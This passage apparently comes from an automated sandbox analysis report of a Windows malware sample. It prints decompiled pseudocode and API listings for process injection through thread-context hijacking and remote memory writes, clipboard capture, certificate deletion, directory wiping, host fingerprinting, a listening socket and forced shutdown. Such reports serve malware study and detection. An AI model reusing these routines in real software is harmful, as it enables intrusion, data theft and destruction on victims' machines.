							_t66 = _v720.Eip -  *0x41a2bc; // 0x774cba60
							if(_t66 != 0) {
								goto L12;
							} else {
								if(( *0x41a290 & 0x00000008) != 0) {
									_t56 = _t56 ^ _v720.Eax;
								}
								_v720.Eax = _t56;
								_v720.ContextFlags = 0x10002;
								if(SetThreadContext( *_t51,  &_v720) == 0) {
									goto L12;
								}
							}
						}
						CloseHandle(_a44);
					}
				}
				return _a40;
			}

















            0x00404a40
            0x00404a4a
            0x00404a52
            0x00404a71
            0x00404a77
            0x00404a7c
            0x00404abc
            0x00404ac1
            0x00404ac4
            0x00404ac6
            0x00404acc
            0x00404ad3
            0x00404ad8
            0x00404adb
            0x00404ae3
            0x00404aef
            0x00404af5
            0x00404b07
            0x00404b49
            0x00404b55
            0x00404b09
            0x00404b0f
            0x00404b15
            0x00000000
            0x00404b17
            0x00404b1e
            0x00404b20
            0x00404b20
            0x00404b2f
            0x00404b35
            0x00404b47
            0x00000000
            0x00000000
            0x00404b47
            0x00404b15
            0x00404b5e
            0x00404b65
            0x00404ac6
            0x00404b6b

            APIs
              • Part of subcall function 00403E2A: WaitForSingleObject.KERNEL32(000000FF,00404A1C), ref: 00403E32
            • NtCreateUserProcess.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 00404A71
              • Part of subcall function 00403E39: WaitForSingleObject.KERNEL32(00000000,00405F1B,00000310,00000000,00000310,909011A2,00000002), ref: 00403E41
            • GetProcessId.KERNEL32(?), ref: 00404AAD
              • Part of subcall function 00403C5D: CreateMutexW.KERNEL32(0041A2C8,00000001,00000000,0041A50C,?,?,00000002,?), ref: 00403CAC
            • GetThreadContext.KERNEL32(00000000,?,00000000,00000000,?,?,00000000), ref: 00404AFF
            • SetThreadContext.KERNEL32(00000000,00010003,?,?,00000000), ref: 00404B3F
            • VirtualFreeEx.KERNEL32(?,00000001,00000000,00008000,?,?,00000000), ref: 00404B55
            • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00404B5E
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: ContextCreateObjectProcessSingleThreadWait$CloseFreeHandleMutexUserVirtual
            • String ID:
            • API String ID: 3545650457-0
            • Opcode ID: 1323c8c917bd89d7b08198baa0c19d386b7bd6ce498f7d807996149312b5069b
            • Instruction ID: b10a16ddd4d2317af295e0f180d180b9b96be2f21529240136dd57cd9b6965b8
            • Opcode Fuzzy Hash: 1323c8c917bd89d7b08198baa0c19d386b7bd6ce498f7d807996149312b5069b
            • Instruction Fuzzy Hash: 1C315C71801219ABDF119F65CD48BDA7BB9BF48344F0441A6FE08B62A0C779E950CF58
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00411780 Relevance: 9.1, APIs: 6, Instructions: 53encryptionCOMMON
            Download Yara Rule
            APIs
            • CryptAcquireContextW.ADVAPI32(00415D8D,00000000,00000000,00000001,F0000040,00000000,00415D8D,?,00000030,?,?,?,004162B0,?), ref: 00411799
            • CryptCreateHash.ADVAPI32(00008003,00008003,00000000,00000000,?,?,?,004162B0,?), ref: 004117B1
            • CryptHashData.ADVAPI32(?,00000010), ref: 004117CC
            • CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 004117E3
            • CryptDestroyHash.ADVAPI32(?), ref: 004117FA
            • CryptReleaseContext.ADVAPI32(?,00000000,?,?,004162B0,?), ref: 00411804
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamRelease
            • String ID:
            • API String ID: 3186506766-0
            • Opcode ID: 676bb2171356b531c7bbb4ff1ad55c716f430b18c5059675bca8e2cffe408d23
            • Instruction ID: 594a383f6d8fa77db36cdc1e291955084bacb3509496565f58e63fc419ad1755
            • Opcode Fuzzy Hash: 676bb2171356b531c7bbb4ff1ad55c716f430b18c5059675bca8e2cffe408d23
            • Instruction Fuzzy Hash: 0F11157590024DBFEF119FA4CD88FEEBB7CEB04384F008065B661B12B0D77689949B28
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040CEC4 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 189COMMON
            Download Yara Rule
            C-Code - Quality: 43%
            			E0040CEC4(char* __ecx, void* __edx, signed int _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				char _v20;
				char _v64;
				char _v552;
				char _v556;
				short _v588;
				void* __ebx;
				void* __esi;
				signed int _t62;
				signed int _t64;
				signed int _t65;
				signed short _t71;
				signed short _t75;
				void* _t92;
				void* _t95;
				void* _t97;
				signed short _t99;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				void* _t105;
				void* _t109;
				signed int _t111;
				char* _t112;
				void* _t113;

				_t109 = __edx;
				_t106 = __ecx;
				_t111 = _a4;
				_t99 = 1;
				_v5 = 0;
				if( *_t111 == 0) {
					_t97 = E00415DA2();
					 *_t111 = _t97;
					if(_t97 == 0) {
						return 0;
					}
					_v5 = 1;
				}
				__eflags = _a8 & 0x00000001;
				if((_a8 & 0x00000001) == 0) {
					L9:
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) != 0) {
						_push( &_v12);
						_push(0x20000);
						_push(0x2713);
						_t105 = 4;
						_v12 = 0x2000800;
						_t99 = E00415DBE(_t111, _t105);
					}
					L11:
					__eflags = _a8 & 0x00000004;
					if((_a8 & 0x00000004) == 0) {
						L16:
						__eflags = _t99;
						if(_t99 == 0) {
							L32:
							__eflags = _v5 - 1;
							if(_v5 == 1) {
								E00410418( *_t111);
								 *_t111 =  *_t111 & 0x00000000;
								__eflags =  *_t111;
							}
							L34:
							return _t99;
						}
						__eflags = _a8 & 0x00000008;
						if((_a8 & 0x00000008) == 0) {
							L20:
							__eflags = _t99;
							if(_t99 == 0) {
								goto L32;
							}
							__eflags = _a8 & 0x00000010;
							if((_a8 & 0x00000010) == 0) {
								L28:
								__eflags = _t99;
								if(_t99 == 0) {
									goto L32;
								}
								__eflags = _a8 & 0x00000020;
								if((_a8 & 0x00000020) != 0) {
									E0040CE08(_t106, _t111, 2);
									E0040CE08(_t106, _t111, 0x17);
								}
								goto L34;
							}
							_t62 = GetModuleFileNameW(0,  &_v588, 0x103);
							_a4 = _t62;
							__eflags = _t62;
							if(_t62 > 0) {
								__eflags = 0;
								 *((short*)(_t113 + _t62 * 2 - 0x248)) = 0;
								_t106 =  &_v588;
								_t99 = E00415E6B(_t62,  &_v588, _t109, 0, _t111, 0x271e);
							}
							_a4 = 0x104;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L32;
							} else {
								_push( &_a4);
								_t64 =  &_v588;
								_push(_t64);
								_push(2);
								L00416BB0();
								__eflags = _t64;
								if(_t64 != 0) {
									_t65 = _a4;
									__eflags = _t65;
									if(_t65 > 0) {
										__eflags = 0;
										 *((short*)(_t113 + _t65 * 2 - 0x248)) = 0;
										_t106 =  &_v588;
										_t99 = E00415E6B(_t65,  &_v588, _t109, 0, _t111, 0x271f);
									}
								}
								goto L28;
							}
						}
						_t112 =  &_v20;
						E0040F48A(_t112);
						_push(_t112);
						_push(0x20000);
						_push(0x271c);
						_t100 = 6;
						_t71 = E00415DBE(_a4, _t100);
						_t99 = _t71;
						__eflags = _t99;
						if(_t99 == 0) {
							_t111 = _a4;
							goto L32;
						}
						__imp__GetUserDefaultUILanguage();
						_v12 = _t71 & 0x0000ffff;
						_push( &_v12);
						_push(0x20000);
						_push(0x271d);
						_t101 = 2;
						_t75 = E00415DBE(_a4, _t101);
						_t111 = _a4;
						_t99 = _t75;
						goto L20;
					}
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = E0041051A();
					_push( &_v12);
					_push(0x20000);
					_push(0x2719);
					_t102 = 4;
					_t99 = E00415DBE(_t111, _t102);
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = E00410542();
					_push( &_v12);
					_push(0x20000);
					_push(0x271b);
					_t103 = 4;
					_t99 = E00415DBE(_t111, _t103);
					__eflags = _t99;
					if(_t99 == 0) {
						goto L32;
					}
					_v12 = GetTickCount();
					_push( &_v12);
					_push(0x20000);
					_push(0x271a);
					_t104 = 4;
					_t99 = E00415DBE(_t111, _t104);
					goto L16;
				}
				_t92 = E00403E7C(_t106,  &_v556);
				_t106 =  &_v552;
				_t99 = E00415E6B(_t92,  &_v552, _t109, __eflags, _t111, 0x2711);
				__eflags = _t99;
				if(_t99 == 0) {
					goto L11;
				}
				_t95 = E00403FDC( &_v552,  &_v64);
				__eflags = _v64;
				if(__eflags != 0) {
					_t106 =  &_v64;
					_t99 = E00415E6B(_t95,  &_v64, _t109, __eflags, _t111, 0x2712);
				}
				__eflags = _t99;
				if(_t99 == 0) {
					goto L11;
				}
				goto L9;
			}































            0x0040cec4
            0x0040cec4
            0x0040cecf
            0x0040ced6
            0x0040ced8
            0x0040cedc
            0x0040cede
            0x0040cee3
            0x0040cee7
            0x00000000
            0x0040cee9
            0x0040cef0
            0x0040cef0
            0x0040cef4
            0x0040cefd
            0x0040cf46
            0x0040cf46
            0x0040cf4a
            0x0040cf4f
            0x0040cf50
            0x0040cf51
            0x0040cf58
            0x0040cf5b
            0x0040cf67
            0x0040cf67
            0x0040cf69
            0x0040cf69
            0x0040cf6d
            0x0040cfe2
            0x0040cfe2
            0x0040cfe4
            0x0040d0e6
            0x0040d0e6
            0x0040d0ea
            0x0040d0ee
            0x0040d0f3
            0x0040d0f3
            0x0040d0f3
            0x0040d0f6
            0x00000000
            0x0040d0f6
            0x0040cfea
            0x0040cfee
            0x0040d03c
            0x0040d03c
            0x0040d03e
            0x00000000
            0x00000000
            0x0040d044
            0x0040d048
            0x0040d0c7
            0x0040d0c7
            0x0040d0c9
            0x00000000
            0x00000000
            0x0040d0cb
            0x0040d0cf
            0x0040d0d4
            0x0040d0dc
            0x0040d0dc
            0x00000000
            0x0040d0cf
            0x0040d058
            0x0040d05e
            0x0040d061
            0x0040d063
            0x0040d065
            0x0040d06c
            0x0040d075
            0x0040d080
            0x0040d080
            0x0040d082
            0x0040d089
            0x0040d08b
            0x00000000
            0x0040d08d
            0x0040d090
            0x0040d091
            0x0040d097
            0x0040d098
            0x0040d09a
            0x0040d09f
            0x0040d0a1
            0x0040d0a3
            0x0040d0a6
            0x0040d0a8
            0x0040d0aa
            0x0040d0b1
            0x0040d0ba
            0x0040d0c5
            0x0040d0c5
            0x0040d0a8
            0x00000000
            0x0040d0a1
            0x0040d08b
            0x0040cff0
            0x0040cff3
            0x0040cffa
            0x0040cffe
            0x0040cfff
            0x0040d006
            0x0040d007
            0x0040d00c
            0x0040d00e
            0x0040d010
            0x0040d0e3
            0x00000000
            0x0040d0e3
            0x0040d016
            0x0040d01f
            0x0040d025
            0x0040d029
            0x0040d02a
            0x0040d031
            0x0040d032
            0x0040d037
            0x0040d03a
            0x00000000
            0x0040d03a
            0x0040cf6f
            0x0040cf71
            0x00000000
            0x00000000
            0x0040cf7c
            0x0040cf82
            0x0040cf83
            0x0040cf84
            0x0040cf8b
            0x0040cf93
            0x0040cf95
            0x0040cf97
            0x00000000
            0x00000000
            0x0040cfa2
            0x0040cfa8
            0x0040cfa9
            0x0040cfaa
            0x0040cfb1
            0x0040cfb9
            0x0040cfbb
            0x0040cfbd
            0x00000000
            0x00000000
            0x0040cfc9
            0x0040cfcf
            0x0040cfd0
            0x0040cfd1
            0x0040cfd8
            0x0040cfe0
            0x00000000
            0x0040cfe0
            0x0040cf06
            0x0040cf11
            0x0040cf1c
            0x0040cf1e
            0x0040cf20
            0x00000000
            0x00000000
            0x0040cf26
            0x0040cf2b
            0x0040cf30
            0x0040cf38
            0x0040cf40
            0x0040cf40
            0x0040cf42
            0x0040cf44
            0x00000000
            0x00000000
            0x00000000

            APIs
            • GetTickCount.KERNEL32 ref: 0040CFC3
            • GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,00000000,?,00000000), ref: 0040D016
              • Part of subcall function 00415DA2: HeapAlloc.KERNEL32(00000008,00000034,00416168,?,00000000,?), ref: 00415DAC
            • GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,?,00000000), ref: 0040D058
            • GetUserNameExW.SECUR32(00000002,?,00000104), ref: 0040D09A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: NameUser$AllocCountDefaultFileHeapLanguageModuleTick
            • String ID:
            • API String ID: 2013068177-3916222277
            • Opcode ID: e46572505a966a60fc974644d29ccb132f76c4628cc180b913b50531380d877d
            • Instruction ID: 320ba528d354d06faa93b92cc32402c03688d99dc793a61efda6847a831f2eac
            • Opcode Fuzzy Hash: e46572505a966a60fc974644d29ccb132f76c4628cc180b913b50531380d877d
            • Instruction Fuzzy Hash: F151FF31A41344B9DB20DB65D849FDE7BA89F51708F04806BF948BF2C2D7798AC9CB58
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040BCEA Relevance: 7.6, APIs: 5, Instructions: 71clipboardCOMMON
            Download Yara Rule
            C-Code - Quality: 64%
            			E0040BCEA(void* _a4) {
				signed int _t12;
				void* _t22;
				void* _t24;
				void* _t25;
				int _t26;

				E00403E2A();
				_t26 = _a4;
				_t24 = GetClipboardData(_t26);
				_a4 = _t24;
				if(E00403E39() == 0) {
					return _t24;
				}
				if(_t24 == 0 || _t26 != 1 && _t26 != 0xd && _t26 != 7) {
					L20:
					return _a4;
				} else {
					_t22 = GlobalLock(_t24);
					if(_t22 == 0) {
						L19:
						goto L20;
					}
					_t12 = _t26 - 1;
					if(_t12 == 0) {
						_push(_t22);
						_push(0);
						L12:
						_t25 = E0041065D(_t12 | 0xffffffff);
						L15:
						if(_t25 != 0) {
							EnterCriticalSection(0x41aa48);
							E0040B9DA(0x40214c);
							E0040B9DA(_t25);
							LeaveCriticalSection(0x41aa48);
							if(_t25 != _t22) {
								E00410418(_t25);
							}
						}
						GlobalUnlock(_a4);
						goto L19;
					}
					_t12 = _t12 - 6;
					if(_t12 == 0) {
						_push(_t22);
						_push(1);
						goto L12;
					}
					if(_t12 != 6) {
						_t25 = _a4;
					} else {
						_t25 = _t22;
					}
					goto L15;
				}
			}








            0x0040bcef
            0x0040bcf4
            0x0040bcfe
            0x0040bd00
            0x0040bd0a
            0x00000000
            0x0040bd0c
            0x0040bd15
            0x0040bd9d
            0x00000000
            0x0040bd2a
            0x0040bd32
            0x0040bd36
            0x0040bd9c
            0x00000000
            0x0040bd9c
            0x0040bd3a
            0x0040bd3b
            0x0040bd5a
            0x0040bd5b
            0x0040bd4e
            0x0040bd56
            0x0040bd62
            0x0040bd64
            0x0040bd6c
            0x0040bd77
            0x0040bd7d
            0x0040bd83
            0x0040bd8b
            0x0040bd8e
            0x0040bd8e
            0x0040bd8b
            0x0040bd96
            0x00000000
            0x0040bd96
            0x0040bd3d
            0x0040bd40
            0x0040bd4b
            0x0040bd4c
            0x00000000
            0x0040bd4c
            0x0040bd45
            0x0040bd5f
            0x0040bd47
            0x0040bd47
            0x0040bd47
            0x00000000
            0x0040bd45

            APIs
              • Part of subcall function 00403E2A: WaitForSingleObject.KERNEL32(000000FF,00404A1C), ref: 00403E32
            • GetClipboardData.USER32 ref: 0040BCF8
              • Part of subcall function 00403E39: WaitForSingleObject.KERNEL32(00000000,00405F1B,00000310,00000000,00000310,909011A2,00000002), ref: 00403E41
            • GlobalLock.KERNEL32 ref: 0040BD2C
            • EnterCriticalSection.KERNEL32(0041AA48,00000000,00000000), ref: 0040BD6C
            • LeaveCriticalSection.KERNEL32(0041AA48,00000000,0040214C), ref: 0040BD83
            • GlobalUnlock.KERNEL32(?,00000000,00000000), ref: 0040BD96
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: CriticalGlobalObjectSectionSingleWait$ClipboardDataEnterLeaveLockUnlock
            • String ID:
            • API String ID: 2045610074-0
            • Opcode ID: 1093fdc7397d66979a419b090d22458854e31252a9f5e80cf63fdfb6bfb62878
            • Instruction ID: e0e2c5f222946566b10c26ceb5e59227d2245b7b829b3bafcb8af806f150a66b
            • Opcode Fuzzy Hash: 1093fdc7397d66979a419b090d22458854e31252a9f5e80cf63fdfb6bfb62878
            • Instruction Fuzzy Hash: C5115936500005B7C6213F299984ABFBB59DF91361B14413BFA09B73E1CB7C8C4242EE
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00415B2D Relevance: 7.6, APIs: 5, Instructions: 61fileCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00415B2D(WCHAR* __ecx, void* __eflags) {
				struct _WIN32_FIND_DATAW _v596;
				short _v1116;
				WCHAR* _t38;
				void* _t42;

				_t38 = __ecx;
				if(E00415D45(0x4034fc,  &_v1116, __ecx) == 0) {
					L9:
					SetFileAttributesW(_t38, 0x80);
					return RemoveDirectoryW(_t38) & 0xffffff00 | _t19 != 0x00000000;
				}
				_t42 = FindFirstFileW( &_v1116,  &_v596);
				if(_t42 == 0xffffffff) {
					goto L9;
				} else {
					goto L2;
				}
				do {
					L2:
					if(E00415A06( &(_v596.cFileName)) == 0 && E00415D45( &(_v596.cFileName),  &_v1116, _t38) != 0) {
						_t51 = _v596.dwFileAttributes & 0x00000010;
						if((_v596.dwFileAttributes & 0x00000010) == 0) {
							E004158D7( &_v1116);
						} else {
							E00415B2D( &_v1116, _t51);
						}
					}
				} while (FindNextFileW(_t42,  &_v596) != 0);
				FindClose(_t42);
				goto L9;
			}







            0x00415b3b
            0x00415b4f
            0x00415bca
            0x00415bd0
            0x00415be7
            0x00415be7
            0x00415b64
            0x00415b69
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00415b6b
            0x00415b6b
            0x00415b79
            0x00415b91
            0x00415b99
            0x00415bab
            0x00415b9b
            0x00415b9f
            0x00415b9f
            0x00415b99
            0x00415bbf
            0x00415bc4
            0x00000000

            APIs
              • Part of subcall function 00415D45: PathCombineW.SHLWAPI(?,?,004014A8,004038F5,?,?,?,00000000), ref: 00415D65
            • FindFirstFileW.KERNEL32(?,?,?,?), ref: 00415B5E
            • FindNextFileW.KERNEL32(00000000,?), ref: 00415BB9
            • FindClose.KERNEL32(00000000), ref: 00415BC4
            • SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 00415BD0
            • RemoveDirectoryW.KERNEL32(?), ref: 00415BD7
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: FileFind$AttributesCloseCombineDirectoryFirstNextPathRemove
            • String ID:
            • API String ID: 765042924-0
            • Opcode ID: df1443738ebbb253cdfe07bb5106216db9786ad3c9c4d10b138312695f1abf6e
            • Instruction ID: c1fa861f355615f5f333406c580445452ecd694818c19d369529a4bc7d080bd7
            • Opcode Fuzzy Hash: df1443738ebbb253cdfe07bb5106216db9786ad3c9c4d10b138312695f1abf6e
            • Instruction Fuzzy Hash: 34119832008608DAC320EB64DD4DBEB77ECAFC5314F04466FF995D6190EB78A585875D
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040A15D Relevance: 7.5, APIs: 5, Instructions: 36encryptionCOMMON
            Download Yara Rule
            APIs
            • CertOpenSystemStoreW.CRYPT32(00000000,00402014), ref: 0040A168
            • CertDuplicateCertificateContext.CRYPT32(00000000), ref: 0040A181
            • CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,?,00000001,004042EB), ref: 0040A18C
            • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 0040A194
            • CertCloseStore.CRYPT32(00000000,00000000), ref: 0040A1A0
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Cert$Store$Certificate$CertificatesCloseContextDeleteDuplicateEnumFromOpenSystem
            • String ID:
            • API String ID: 1842529175-0
            • Opcode ID: 2cca78b7e4634e749ecf60a41a80895195da117047974f04266fae40cad096fd
            • Instruction ID: 66c929fe9e79bdc831e492437d17932779c5f8940c9b27c0b8a5836c14af7b05
            • Opcode Fuzzy Hash: 2cca78b7e4634e749ecf60a41a80895195da117047974f04266fae40cad096fd
            • Instruction Fuzzy Hash: 05F0A0322813147AD62117256E18FA7776C9B92B91F040133FA84F66A08E388851857E
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00414E5F Relevance: 6.1, APIs: 4, Instructions: 96memoryinjectionCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00414E5F(void* __eax, void* _a4) {
				char _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				long _v24;
				void* _t35;
				void** _t39;
				void* _t41;
				intOrPtr* _t42;
				int _t43;
				long _t45;
				void* _t46;
				SIZE_T* _t47;
				signed int _t49;
				void** _t52;
				void* _t54;
				void* _t55;
				void* _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				unsigned int _t64;

				_t55 = __eax;
				_t1 = _t55 + 0x3c; // 0xd0
				_t60 =  *_t1 + __eax;
				_t45 =  *(_t60 + 0x50);
				_v24 = _t45;
				_v5 = 0;
				if(IsBadReadPtr(__eax, _t45) == 0) {
					_t35 = VirtualAllocEx(_a4, 0, _t45, 0x3000, 0x40);
					_v12 = _t35;
					__eflags = _t35;
					if(__eflags == 0) {
						L17:
						return _v12;
					}
					_t46 = E0041046B(__eflags, _t55, _t45);
					_t47 = 0;
					__eflags = _t46;
					if(_t46 == 0) {
						L16:
						VirtualFreeEx(_a4, _v12, 0, 0x8000);
						_t30 =  &_v12;
						 *_t30 = _v12 & 0x00000000;
						__eflags =  *_t30;
						goto L17;
					}
					_t7 = _t60 + 0xa0; // 0x170
					_t39 = _t7;
					__eflags = _t39[1];
					if(_t39[1] <= 0) {
						L15:
						E00410418(_t46);
						__eflags = _v5;
						if(_v5 != 0) {
							goto L17;
						}
						goto L16;
					}
					_t41 =  *_t39;
					__eflags = _t41;
					if(_t41 <= 0) {
						goto L15;
					}
					_t61 =  *((intOrPtr*)(_t60 + 0x34));
					_t54 = _v12 - _t61;
					_v20 = _t55 - _t61;
					_t42 = _t41 + _t46;
					while(1) {
						__eflags =  *_t42 - _t47;
						if( *_t42 == _t47) {
							break;
						}
						_t62 =  *((intOrPtr*)(_t42 + 4));
						__eflags = _t62 - 8;
						if(_t62 < 8) {
							L12:
							_t42 = _t42 +  *((intOrPtr*)(_t42 + 4));
							_t47 = 0;
							__eflags = 0;
							continue;
						}
						_t64 = _t62 + 0xfffffff8 >> 1;
						__eflags = _t64;
						_v16 = _t47;
						if(_t64 == 0) {
							goto L12;
						} else {
							goto L9;
						}
						do {
							L9:
							_t49 =  *(_t42 + 8 + _v16 * 2) & 0x0000ffff;
							__eflags = _t49;
							if(_t49 > 0) {
								_t52 = (_t49 & 0x00000fff) +  *_t42 + _t46;
								 *_t52 =  *_t52 + _t54 - _v20;
								__eflags =  *_t52;
							}
							_v16 = _v16 + 1;
							__eflags = _v16 - _t64;
						} while (_v16 < _t64);
						goto L12;
					}
					_t43 = WriteProcessMemory(_a4, _v12, _t46, _v24, _t47);
					__eflags = _t43;
					_t26 =  &_v5;
					 *_t26 = _t43 != 0;
					__eflags =  *_t26;
					goto L15;
				}
				return 0;
			}
























            0x00414e68
            0x00414e6a
            0x00414e6d
            0x00414e6f
            0x00414e74
            0x00414e77
            0x00414e83
            0x00414e99
            0x00414e9f
            0x00414ea2
            0x00414ea4
            0x00414f5a
            0x00000000
            0x00414f5a
            0x00414eb1
            0x00414eb3
            0x00414eb5
            0x00414eb7
            0x00414f43
            0x00414f50
            0x00414f56
            0x00414f56
            0x00414f56
            0x00000000
            0x00414f56
            0x00414ebd
            0x00414ebd
            0x00414ec3
            0x00414ec6
            0x00414f37
            0x00414f38
            0x00414f3d
            0x00414f41
            0x00000000
            0x00000000
            0x00000000
            0x00414f41
            0x00414ec8
            0x00414eca
            0x00414ecc
            0x00000000
            0x00000000
            0x00414ece
            0x00414ed6
            0x00414ed8
            0x00414edb
            0x00414f1c
            0x00414f1c
            0x00414f1e
            0x00000000
            0x00000000
            0x00414edf
            0x00414ee2
            0x00414ee5
            0x00414f17
            0x00414f17
            0x00414f1a
            0x00414f1a
            0x00000000
            0x00414f1a
            0x00414eea
            0x00414eea
            0x00414eec
            0x00414eef
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00414ef1
            0x00414ef1
            0x00414ef4
            0x00414ef9
            0x00414efc
            0x00414f0b
            0x00414f0d
            0x00414f0d
            0x00414f0d
            0x00414f0f
            0x00414f12
            0x00414f12
            0x00000000
            0x00414ef1
            0x00414f2b
            0x00414f31
            0x00414f33
            0x00414f33
            0x00414f33
            0x00000000
            0x00414f33
            0x00000000

            APIs
            • IsBadReadPtr.KERNEL32(00400000,?,00000000,?,00000000,?,00000000,?,?,00000000), ref: 00414E7B
            • VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,00000000), ref: 00414E99
            • WriteProcessMemory.KERNEL32(?,?,00000000,00400000,00000000,00400000,?,?,?,00000000), ref: 00414F2B
            • VirtualFreeEx.KERNEL32(?,?,00000000,00008000,00400000,?,?,?,00000000), ref: 00414F50
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: Virtual$AllocFreeMemoryProcessReadWrite
            • String ID:
            • API String ID: 1273498236-0
            • Opcode ID: a0383efb89150ba53d3786485c5f069575b38c586a09f5cd8a91de44163d146c
            • Instruction ID: 8ce53615bc7d042a47763ce9ea18e9355b32a8ece3c15be76da7397c61c290fe
            • Opcode Fuzzy Hash: a0383efb89150ba53d3786485c5f069575b38c586a09f5cd8a91de44163d146c
            • Instruction Fuzzy Hash: E531A131A00209AFCF109F64CD84BEEBBB5FF85705F05806AE505AB3A0D7749D96CB58
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004133AC Relevance: 6.0, APIs: 4, Instructions: 32networkCOMMON
            Download Yara Rule
            APIs
            • socket.WS2_32(00000000,00000001,00000006), ref: 004133B5
            • bind.WS2_32(00000000,?,-0000001D), ref: 004133D5
            • listen.WS2_32(00000000,?), ref: 004133E4
            • closesocket.WS2_32(00000000), ref: 004133EF
            Memory Dump Source
            • Source File: 00000000.00000002.260107317.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.260144687.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Rd1Kf1A4cB.jbxd
            Similarity
            • API ID: bindclosesocketlistensocket
            • String ID:
            • API String ID: 952684215-0
            • Opcode ID: 7df32db1469fb2c41621e77cd42a14e17b9e721c2988f9feb97ec661e2791ffe
            • Instruction ID: ee6a3e9d37879644315cfa66927fc6425b8b50155a795341b2f372dfe766c62d
            • Opcode Fuzzy Hash: 7df32db1469fb2c41621e77cd42a14e17b9e721c2988f9feb97ec661e2791ffe
            • Instruction Fuzzy Hash: B3F037326002116BE3201F399D49A6F29A99B91B72B540729FD71D51E0DB3C85D19529
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040F964 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35shutdownCOMMON
            Download Yara Rule
            C-Code - Quality: 75%
            			E0040F964(void* __ebx) {
				void* __ecx;
				signed char _t8;
				unsigned int _t11;
				void* _t18;

				_t8 =  *0x41ae90; // 0x0
				_t19 = _t8 & 0x00000010;
				if((_t8 & 0x00000010) == 0) {
					__eflags = _t8 & 0x00000008;
					if(__eflags != 0) {
						E00405A73(__ebx, _t18, __eflags);
						_t8 =  *0x41ae90; // 0x0
					}
					__eflags = _t8 & 0x00000003;
					if((_t8 & 0x00000003) == 0) {
						__eflags = _t8 & 0x00000004;
						if((_t8 & 0x00000004) != 0) {
							return ExitWindowsEx(0x14, 0x80000000);
						}
						return _t8;
					} else {
